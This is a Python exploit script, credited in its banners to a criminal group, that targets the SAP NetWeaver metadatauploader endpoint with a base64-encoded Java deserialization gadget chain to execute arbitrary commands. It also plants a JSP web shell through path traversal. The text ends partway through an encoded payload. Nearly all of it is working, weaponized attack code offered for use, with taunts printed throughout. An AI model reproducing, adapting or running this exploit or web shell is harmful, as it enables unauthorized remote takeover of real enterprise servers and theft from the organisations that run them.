## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----

import base64
import requests
import zipfile
import io
import random
import argparse
import string

def get_args():
    parser = argparse.ArgumentParser(description="SAP Exploit Script")
    parser.add_argument("target", help="Target URL")
    parser.add_argument("--command", help="Command to execute on the target")
    parser.add_argument("--dropshell", action="store_true", help="Drop a shell on the target")
    return parser.parse_args()

args = get_args()
TARGET = args.target
PROXY = {}

def generate_random_filename(length=8):
    letters = string.ascii_lowercase
    print("fuck da CCP man dey stole our 0day frfr")
    return ''.join(random.choice(letters) for i in range(length)) + ".jsp"

SHELL_NAME = generate_random_filename()

def sendReq(newContent, drop_shell=False):
    global SHELL_NAME, TARGET
    with io.BytesIO() as bytes_stream:
        with zipfile.ZipFile(bytes_stream, "w", compression=zipfile.ZIP_DEFLATED) as zip_file:
            zip_file.writestr(".properties", newContent)
        
        bytes_data = bytes_stream.getvalue()

        url = TARGET + "/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1"
        headers = {"Content-Type": "application/octet-stream",
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)" }
        response = requests.post(url, data=bytes_data, headers=headers, verify=False, proxies=PROXY)
        print("MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- fuck da CCP man dey stole our 0day frfr ---- MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----")
        if response.status_code != 200:
            print("[-] Exploit failed!")
        else:
            if "Cause - Getter getOutputProperties" in response.text:
                print("[+] Exploit should be success!")
                if drop_shell:
                    print(f"[+] Shell available at {TARGET}/irj/{SHELL_NAME}")
            elif "local class serialVersionUID = -7308740002576184038" in response.text:
                print("[+] Found version 7.5")
                newContent = newContent.replace(b"\xF4\x51\xDC\xAA\x00\xB6\xF0\xCC", b"\x9A\x92\x23\xB0\xE6\xC2\x4D\x1A")
                sendReq(newContent, drop_shell)

if args.command:
    cmd = args.command
    payload_size = len(cmd)
    print("MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- fuck da CCP man dey stole our 0day frfr ---- MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----")
    total_size = 1711 + payload_size #total_size = 0x98 + payload_len
    total_size_bytes = total_size.to_bytes(2, byteorder='big')
    h1 = base64.b64decode("rO0ABXNyABRqYXZhLnV0aWwuUHJvcGVydGllczkS0HpwNj6YAgABTAAIZGVmYXVsdHN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHIAE2phdmEudXRpbC5IYXNodGFibGUTuw8lIUrkuAMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAIdwgAAAALAAAAAXQABGFhYWFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAACAAAAAnNxAH4ABT9AAAAAAAAMdwgAAAAQAAAAAnQAAnh4c3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAF0AAJ2MXNyADljb20uc2FwLnNkby5pbXBsLm9iamVjdHMuc3RyYXRlZ3kucG9qby5Qb2pvUHJvcE11bHRpVmFsdWVh3L4MJ1IlzAIAAHhyAERjb20uc2FwLnNkby5pbXBsLm9iamVjdHMuc3RyYXRlZ3kuQWJzdHJhY3ROb25TZXF1ZW5jZWRQcm9wTXVsdGlWYWx1ZRpvhOAFs8zDAgAAeHIAOGNvbS5zYXAuc2RvLmltcGwub2JqZWN0cy5zdHJhdGVneS5BYnN0cmFjdFByb3BNdWx0aVZhbHVl6Z7F3cAMTCYCAAJMAA1fZGF0YVN0cmF0ZWd5dAA4TGNvbS9zYXAvc2RvL2ltcGwvb2JqZWN0cy9zdHJhdGVneS9BYnN0cmFjdERhdGFTdHJhdGVneTtMAAlfcHJvcGVydHl0ACRMY29tL3NhcC9zZG8vaW1wbC90eXBlcy9TZG9Qcm9wZXJ0eTt4cHNyADdjb20uc2FwLnNkby5pbXBsLm9iamVjdHMuc3RyYXRlZ3kucG9qby5Qb2pvRGF0YVN0cmF0ZWd52bcZk1qmlmsCAAFMABFfcG9qb1RvRGF0YU9iamVjdHQAD0xqYXZhL3V0aWwvTWFwO3hyAENjb20uc2FwLnNkby5pbXBsLm9iamVjdHMuc3RyYXRlZ3kuZW5oYW5jZXIuQWJzdHJhY3RQb2pvRGF0YVN0cmF0ZWd5NecqtnylCGMCAAFMAAVfcG9qb3QAEkxqYXZhL2xhbmcvT2JqZWN0O3hyADZjb20uc2FwLnNkby5pbXBsLm9iamVjdHMuc3RyYXRlZ3kuQWJzdHJhY3REYXRhU3RyYXRlZ3n+tryb9uYRewIABloADV9pbml0aWFsU2NvcGVaABRfaXNSZWFkT25seUFjdGl2YXRlZFoAB194c2lOaWxaABJfeHNpTmlsSW5pdGlhbGl6ZWRMAAxfY2hhbmdlU3RhdGV0AERMY29tL3NhcC9zZG8vaW1wbC9vYmplY3RzL3N0cmF0ZWd5L0Fic3RyYWN0RGF0YVN0cmF0ZWd5JENoYW5nZVN0YXRlO0wABF9nZG90ACxMY29tL3NhcC9zZG8vaW1wbC9vYmplY3RzL0dlbmVyaWNEYXRhT2JqZWN0O3hwAAEAAHBzcgAqY29tLnNhcC5zZG8uaW1wbC5vYmplY3RzLkdlbmVyaWNEYXRhT2JqZWN02z64Nz2AAU0CAARMABVfY29udGFpbm1lbnRQcm9wVmFsdWV0ACRMY29tL3NhcC9zZG8vaW1wbC9vYmplY3RzL1Byb3BWYWx1ZTtMAA1fZGF0YVN0cmF0ZWd5dAAnTGNvbS9zYXAvc2RvL2ltcGwvb2JqZWN0cy9EYXRhU3RyYXRlZ3k7TAAHX2ZhY2FkZXQALkxjb20vc2FwL3Nkby9pbXBsL29iamVjdHMvRGF0YU9iamVjdERlY29yYXRvcjtMAA9fdHlwZUFuZENvbnRleHR0ACdMY29tL3NhcC9zZG8vaW1wbC90eXBlcy9UeXBlQW5kQ29udGV4dDt4cHBzcgA+Y29tLnNhcC5zZG8uaW1wbC5vYmplY3RzLnN0cmF0ZWd5Lk9wZW5Ob25TZXF1ZW5jZWREYXRhU3RyYXRlZ3mC/IFSOtsC4wIAAUwAD19vcGVuUHJvcGVydGllc3QAFUxqYXZhL3V0aWwvQXJyYXlMaXN0O3hyADpjb20uc2FwLnNkby5pbXBsLm9iamVjdHMuc3RyYXRlZ3kuTm9uU2VxdWVuY2VkRGF0YVN0cmF0ZWd523vLWBKWGUYCAAB4cgA9Y29tLnNhcC5zZG8uaW1wbC5vYmplY3RzLnN0cmF0ZWd5LkFic3RyYWN0RGVmYXVsdERhdGFTdHJhdGVneaXyH6Ca6IlMAgABWwALX3Byb3BWYWx1ZXN0ABNbTGphdmEvbGFuZy9PYmplY3Q7eHEAfgAXAAEAAHBxAH4AIHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA8Y29tLnNhcC5zZG8uaW1wbC5vYmplY3RzLnN0cmF0ZWd5Lk5vblNlcXVlbmNlZFByb3BNdWx0aVZhbHVlYhNYcEEnxCMCAAJJAAVfc2l6ZVsAB192YWx1ZXNxAH4AJXhxAH4ADnEAfgAmc3IAMmNvbS5zYXAuc2RvLmltcGwudHlwZXMuYnVpbHRpbi5Qcm9wZXJ0eUxvZ2ljRmFjYWRlB+0tHi4l9hQCAANMAA9fY29udGFpbmluZ1R5cGV0ABJMY29tbW9uai9zZG8vVHlwZTtMAARfa2V5dAAgTGNvbS9zYXAvc2RvL2ltcGwvdHlwZXMvUHJvcEtleTtMAAlfcHJvcE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cgAsY29tLnNhcC5zZG8uaW1wbC50eXBlcy5idWlsdGluLlByb3BlcnR5TG9naWN6RVLdC6Jn9wIAAUkABl9pbmRleHhyADNjb20uc2FwLnNkby5pbXBsLnR5cGVzLmJ1aWx0aW4uRGVsZWdhdGluZ0RhdGFPYmplY3SJc0HW7htRHwIAAHhw/////3BzcgAeY29tLnNhcC5zZG8uaW1wbC50eXBlcy5Qcm9wS2V5qwSkdWvYXTQCAAxaAAtjb250YWlubWVudFoABG1hbnlaAAttYW55VW5rbm93bloAFXNpbXBsZUNvbnRlbnRQcm9wZXJ0eVoACnhtbEVsZW1lbnRMAAVhbGlhc3QAEExqYXZhL3V0aWwvTGlzdDtMAA1oZWxwZXJDb250ZXh0dAAiTGNvbW1vbmovc2RvL2hlbHBlci9IZWxwZXJDb250ZXh0O0wABG5hbWVxAH4ALkwABHR5cGV0ACJMY29tL3NhcC9zZG8vYXBpL3V0aWwvVVJJTmFtZVBhaXI7TAADdXJpcQB+AC5MAAd4bWxOYW1lcQB+AC5MAAd4c2RUeXBlcQB+ADV4cAABAAABc3IAH2phdmEudXRpbC5Db2xsZWN0aW9ucyRFbXB0eUxpc3R6uBe0PKee3gIAAHhwc3IAKmNvbS5zYXAuc2RvLmltcGwuY29udGV4dC5IZWxwZXJDb250ZXh0SW1wbKo1AR5naMIcAgAETAADX2lkcQB+AC5MABhfbWFwcGluZ1N0cmF0ZWd5UHJvcGVydHl0ABZMY29tbW9uai9zZG8vUHJvcGVydHk7TAAIX29wdGlvbnNxAH4AFEwADl9wYXJlbnRDb250ZXh0dAAsTGNvbS9zYXAvc2RvL2ltcGwvY29udGV4dC9IZWxwZXJDb250ZXh0SW1wbDt4cHQAHmNvbS5zYXAuc2RvLmFwaS50eXBlcy5jdHguY29yZXBzcQB+AAU/QAAAAAAAAHcIAAAAEAAAAAB4cHQABGFhYTJzcgAgY29tLnNhcC5zZG8uYXBpLnV0aWwuVVJJTmFtZVBhaXJW1fSPZjBbrAIAAkwABV9uYW1lcQB+AC5MAARfdXJpcQB+AC54cHQABlN0cmluZ3QAC2NvbW1vbmouc2RvdAAAcQB+AD9zcQB+AEBxAH4ARHEAfgBEcQB+AD8AAAABdXEAfgAnAAAACnQABHh4eHhwcHBwcHBwcHBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAXcEAAAAAXEAfgAxeHEAfgAgc3IAJ2NvbS5zYXAuc2RvLmltcGwudHlwZXMuYnVpbHRpbi5PcGVuVHlwZR6Nk2oD2NaSAgAAeHIAK2NvbS5zYXAuc2RvLmltcGwudHlwZXMuYnVpbHRpbi5NZXRhRGF0YVR5cGXilpqoGgykFgIAAkwACl9leHRyYURhdGFxAH4AFEwABF91bnBxAH4ANXhyAC1jb20uc2FwLnNkby5pbXBsLnR5cGVzLmJ1aWx0aW4uTWV0YURhdGFPYmplY3T0UdyqALbwzAIAAHhwc3EAfgAFP0AAAAAAAAB3CAAAABAAAAAAeHNxAH4AQHQACE9wZW5UeXBldAALY29tLnNhcC5zZG9zcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AC5MABFfb3V0cHV0UHJvcGVydGllc3EAfgABeHAAAAAA/////3VyAANbW0JL/RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF/gGCFTgAgAAeHAAAA==")
    h2 = base64.b64decode("yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEAIUdhZGdldHMuamF2YSBmcm9tIElucHV0RmlsZU9iamVjdAwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgE=")
    tail = base64.b64decode("CAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVyMjc0NTc2NTI4MDMzMzAwAQAgTHlzb3NlcmlhbC9Qd25lcjI3NDU3NjUyODAzMzMwMDsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAAMwABAAEAAAAFKrcAAbEAAAACAA0AAAAKAAIAAADwAAQA8QAOAAAADAABAAAABQAPADgAAAABABMAFAACAAwAAAA/AAAAAwAAAAGxAAAAAgANAAAABgABAAAA9AAOAAAAIAADAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABcAGAACABkAAAAEAAEAGgABABMAGwACAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAA9wAOAAAAKgAEAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABwAHQACAAAAAQAeAB8AAwAZAAAABAABABoACAApAAsAAQAMAAAAJAADAAIAAAAPpwADAUy4AC8SMbYANVexAAAAAQA2AAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJdXEAfgBYAAAB7cr+ur4AAAAyABsKAAMAFQcAFwcAGAcAGQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQVx5mnuPG1HGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADRm9vAQAMSW5uZXJDbGFzc2VzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vOwEAClNvdXJjZUZpbGUBACFHYWRnZXRzLmphdmEgZnJvbSBJbnB1dEZpbGVPYmplY3QMAAoACwcAGgEAI3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgAAQABAAoACwABAAwAAAAzAAEAAQAAAAUqtwABsQAAAAIADQAAAAoAAgAAAOkABADqAA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4cHNxAH4AK/////9wc3EAfgAyAAEAAAFxAH4AOHEAfgA8dAAQb3V0cHV0UHJvcGVydGllc3NxAH4AQHQABk9iamVjdHEAfgBDcQB+AERxAH4AXnEAfgBFcQB+AF54cQB+AAdzcQB+AAU/QAAAAAAADHcIAAAAEAAAAAJxAH4ACHEAfgAScQB+AAxxAH4AC3hxAH4AYXh4cA==")

    # content = bytearray(h1)
    # content.append(total_size_bytes)
    # content += h2
    # content.append(payload_size.to_bytes(2, byteorder='big'))
    # content += cmd.encode()
    # content += tail
    newContent = h1 + total_size_bytes + h2 + payload_size.to_bytes(2, byteorder='big') + cmd.encode() + tail

    random_numbers = str(random.randint(10**14, 10**15-1))
    random_numbers = random_numbers.encode()
    content = newContent
    # content = content.replace(b"ysoserial", b"xsyseryal").replace(b"Gadgets", b"Havgets").replace(b"122238185438600", random_numbers)
    # f = open("aaa.ser", "wb")
    # # print(hex(len(h1)))
    # f.write(content)
    # f.close()
    # exit()
    
    sendReq(newContent)
                
elif args.dropshell:
    content = """<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
    String[] cmdArray;
    if (System.getProperty("os.name").toLowerCase().contains("win")) {
        cmdArray = new String[] {"cmd.exe", "/c", request.getParameter("cmd")};
    } else {
        cmdArray = new String[] {"/bin/sh", "-c", request.getParameter("cmd")};
    }
    
    Process process = Runtime.getRuntime().exec(cmdArray);
    
    // Read the output
    BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
    String line;
    out.println("<pre>");
    while ((line = reader.readLine()) != null) {
        out.println(line);
    }
    
    // Read errors too (JDK6 doesn't have redirectErrorStream in ProcessBuilder)
    BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
    while ((line = errorReader.readLine()) != null) {
        out.println(line);
    }
    out.println("</pre>");
}
%>"""
    
    # shell_name = "random.jsp"
    # content = "YXNkYXNkYXNk"
    content = base64.b64encode(content.encode()).decode()
    fileName = "../apps/sap.com/irj/servlet_jsp/irj/root/" + SHELL_NAME
    # fileName = "../apps/sap.com/irj/servlet_jsp/irj/root/r1.jsp"
    # change random.jsp to the file you want to upload
    # uploaded file will be available at http://saplab02.localdomain:50000/irj/random.jsp
    print("MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- fuck da CCP man dey stole our 0day frfr ---- MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----")
    fileNameLen = len(fileName)
    total_size = 1847 + fileNameLen + len(content)
    total_size_bytes = total_size.to_bytes(2, byteorder='big')

    head = base64.b64decode("rO0ABXNyABRqYXZhLnV0aWwuUHJvcGVydGllczkS0HpwNj6YAgABTAAIZGVmYXVsdHN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHIAE2phdmEudXRpbC5IYXNodGFibGUTuw8lIUrkuAMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAIdwgAAAALAAAAAXQABGFhYWFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAACAAAAAnNxAH4ABT9AAAAAAAAMdwgAAAAQAAAAAnQAAnh4c3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAF0AAJ2MXNyAD1jb20uc2FwLnNkby5pbXBsLm9iamVjdHMucHJvamVjdGlvbnMuUHJvamVjdGlvblByb3BNdWx0aVZhbHVlXdwlyCqzgtkCAANMAAlfZGVsZWdhdGV0ACRMY29tL3NhcC9zZG8vaW1wbC9vYmplY3RzL1Byb3BWYWx1ZTtMAAlfcHJvcGVydHl0ABZMY29tbW9uai9zZG8vUHJvcGVydHk7TAAJX3N0cmF0ZWd5dAA9TGNvbS9zYXAvc2RvL2ltcGwvb2JqZWN0cy9wcm9qZWN0aW9ucy9Qcm9qZWN0aW9uRGF0YVN0cmF0ZWd5O3hwc3IAQmNvbS5zYXAuc2RvLmltcGwub2JqZWN0cy5zdHJhdGVneS5lbmhhbmNlci5FbmhhbmNlclByb3BTaW5nbGVWYWx1ZQpvvLZAyG4NAgAAeHIARWNvbS5zYXAuc2RvLmltcGwub2JqZWN0cy5zdHJhdGVneS5BYnN0cmFjdE5vblNlcXVlbmNlZFByb3BTaW5nbGVWYWx1ZXn2A+LbBfEzAgAAeHIAOWNvbS5zYXAuc2RvLmltcGwub2JqZWN0cy5zdHJhdGVneS5BYnN0cmFjdFByb3BTaW5nbGVWYWx1ZaNPivXPkXo/AgACTAANX2RhdGFTdHJhdGVneXQAOExjb20vc2FwL3Nkby9pbXBsL29iamVjdHMvc3RyYXRlZ3kvQWJzdHJhY3REYXRhU3RyYXRlZ3k7TAAJX3Byb3BlcnR5dAAkTGNvbS9zYXAvc2RvL2ltcGwvdHlwZXMvU2RvUHJvcGVydHk7eHBzcgA/Y29tLnNhcC5zZG8uaW1wbC5vYmplY3RzLnN0cmF0ZWd5LmVuaGFuY2VyLkVuaGFuY2VyRGF0YVN0cmF0ZWd52bcZk1qmlmsCAAB4cgBDY29tLnNhcC5zZG8uaW1wbC5vYmplY3RzLnN0cmF0ZWd5LmVuaGFuY2VyLkFic3RyYWN0UG9qb0RhdGFTdHJhdGVneTXnKrZ8pQhjAgABTAAFX3Bvam90ABJMamF2YS9sYW5nL09iamVjdDt4cgA2Y29tLnNhcC5zZG8uaW1wbC5vYmplY3RzLnN0cmF0ZWd5LkFic3RyYWN0RGF0YVN0cmF0ZWd5/ra8m/bmEXsCAAZaAA1faW5pdGlhbFNjb3BlWgAUX2lzUmVhZE9ubHlBY3RpdmF0ZWRaAAdfeHNpTmlsWgASX3hzaU5pbEluaXRpYWxpemVkTAAMX2NoYW5nZVN0YXRldABETGNvbS9zYXAvc2RvL2ltcGwvb2JqZWN0cy9zdHJhdGVneS9BYnN0cmFjdERhdGFTdHJhdGVneSRDaGFuZ2VTdGF0ZTtMAARfZ2RvdAAsTGNvbS9zYXAvc2RvL2ltcGwvb2JqZWN0cy9HZW5lcmljRGF0YU9iamVjdDt4cAABAABwc3IAKmNvbS5zYXAuc2RvLmltcGwub2JqZWN0cy5HZW5lcmljRGF0YU9iamVjdNs+uDc9gAFNAgAETAAVX2NvbnRhaW5tZW50UHJvcFZhbHVlcQB+AA5MAA1fZGF0YVN0cmF0ZWd5dAAnTGNvbS9zYXAvc2RvL2ltcGwvb2JqZWN0cy9EYXRhU3RyYXRlZ3k7TAAHX2ZhY2FkZXQALkxjb20vc2FwL3Nkby9pbXBsL29iamVjdHMvRGF0YU9iamVjdERlY29yYXRvcjtMAA9fdHlwZUFuZENvbnRleHR0ACdMY29tL3NhcC9zZG8vaW1wbC90eXBlcy9UeXBlQW5kQ29udGV4dDt4cHBzcgA+Y29tLnNhcC5zZG8uaW1wbC5vYmplY3RzLnN0cmF0ZWd5Lk9wZW5Ob25TZXF1ZW5jZWREYXRhU3RyYXRlZ3mC/IFSOtsC4wIAAUwAD19vcGVuUHJvcGVydGllc3QAFUxqYXZhL3V0aWwvQXJyYXlMaXN0O3hyADpjb20uc2FwLnNkby5pbXBsLm9iamVjdHMuc3RyYXRlZ3kuTm9uU2VxdWVuY2VkRGF0YVN0cmF0ZWd523vLWBKWGUYCAAB4cgA9Y29tLnNhcC5zZG8uaW1wbC5vYmplY3RzLnN0cmF0ZWd5LkFic3RyYWN0RGVmYXVsdERhdGFTdHJhdGVneaXyH6Ca6IlMAgABWwALX3Byb3BWYWx1ZXN0ABNbTGphdmEvbGFuZy9PYmplY3Q7eHEAfgAbAAEAAHBxAH4AI3VyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA8Y29tLnNhcC5zZG8uaW1wbC5vYmplY3RzLnN0cmF0ZWd5Lk5vblNlcXVlbmNlZFByb3BNdWx0aVZhbHVlYhNYcEEnxCMCAAJJAAVfc2l6ZVsAB192YWx1ZXNxAH4AKHhyAERjb20uc2FwLnNkby5pbXBsLm9iamVjdHMuc3RyYXRlZ3kuQWJzdHJhY3ROb25TZXF1ZW5jZWRQcm9wTXVsdGlWYWx1ZRpvhOAFs8zDAgAAeHIAOGNvbS5zYXAuc2RvLmltcGwub2JqZWN0cy5zdHJhdGVneS5BYnN0cmFjdFByb3BNdWx0aVZhbHVl6Z7F3cAMTCYCAAJMAA1fZGF0YVN0cmF0ZWd5cQB+ABVMAAlfcHJvcGVydHlxAH4AFnhwcQB+AClzcgAyY29tLnNhcC5zZG8uaW1wbC50eXBlcy5idWlsdGluLlByb3BlcnR5TG9naWNGYWNhZGUH7S0eLiX2FAIAA0wAD19jb250YWluaW5nVHlwZXQAEkxjb21tb25qL3Nkby9UeXBlO0wABF9rZXl0ACBMY29tL3NhcC9zZG8vaW1wbC90eXBlcy9Qcm9wS2V5O0wACV9wcm9wTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO3hyACxjb20uc2FwLnNkby5pbXBsLnR5cGVzLmJ1aWx0aW4uUHJvcGVydHlMb2dpY3pFUt0Lomf3AgABSQAGX2luZGV4eHIAM2NvbS5zYXAuc2RvLmltcGwudHlwZXMuYnVpbHRpbi5EZWxlZ2F0aW5nRGF0YU9iamVjdIlzQdbuG1EfAgAAeHD/////cHNyAB5jb20uc2FwLnNkby5pbXBsLnR5cGVzLlByb3BLZXmrBKR1a9hdNAIADFoAC2NvbnRhaW5tZW50WgAEbWFueVoAC21hbnlVbmtub3duWgAVc2ltcGxlQ29udGVudFByb3BlcnR5WgAKeG1sRWxlbWVudEwABWFsaWFzdAAQTGphdmEvdXRpbC9MaXN0O0wADWhlbHBlckNvbnRleHR0ACJMY29tbW9uai9zZG8vaGVscGVyL0hlbHBlckNvbnRleHQ7TAAEbmFtZXEAfgAzTAAEdHlwZXQAIkxjb20vc2FwL3Nkby9hcGkvdXRpbC9VUklOYW1lUGFpcjtMAAN1cmlxAH4AM0wAB3htbE5hbWVxAH4AM0wAB3hzZFR5cGVxAH4AOnhwAAEAAAFzcgAfamF2YS51dGlsLkNvbGxlY3Rpb25zJEVtcHR5TGlzdHq4F7Q8p57eAgAAeHBzcgAqY29tLnNhcC5zZG8uaW1wbC5jb250ZXh0LkhlbHBlckNvbnRleHRJbXBsqjUBHmdowhwCAARMAANfaWRxAH4AM0wAGF9tYXBwaW5nU3RyYXRlZ3lQcm9wZXJ0eXEAfgAPTAAIX29wdGlvbnN0AA9MamF2YS91dGlsL01hcDtMAA5fcGFyZW50Q29udGV4dHQALExjb20vc2FwL3Nkby9pbXBsL2NvbnRleHQvSGVscGVyQ29udGV4dEltcGw7eHB0AB5jb20uc2FwLnNkby5hcGkudHlwZXMuY3R4LmNvcmVwc3EAfgAFP0AAAAAAAAB3CAAAABAAAAAAeHB0AARhYWEyc3IAIGNvbS5zYXAuc2RvLmFwaS51dGlsLlVSSU5hbWVQYWlyVtX0j2YwW6wCAAJMAAVfbmFtZXEAfgAzTAAEX3VyaXEAfgAzeHB0AAZTdHJpbmd0AAtjb21tb25qLnNkb3QAAHEAfgBEc3EAfgBFcQB+AElxAH4ASXEAfgBEAAAAAXVxAH4AKgAAAAp0AAR4eHh4cHBwcHBwcHBwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAF3BAAAAAFxAH4ANnhxAH4AI3NyACdjb20uc2FwLnNkby5pbXBsLnR5cGVzLmJ1aWx0aW4uT3BlblR5cGUejZNqA9jWkgIAAHhyACtjb20uc2FwLnNkby5pbXBsLnR5cGVzLmJ1aWx0aW4uTWV0YURhdGFUeXBl4paaqBoMpBYCAAJMAApfZXh0cmFEYXRhcQB+AD9MAARfdW5wcQB+ADp4cgAtY29tLnNhcC5zZG8uaW1wbC50eXBlcy5idWlsdGluLk1ldGFEYXR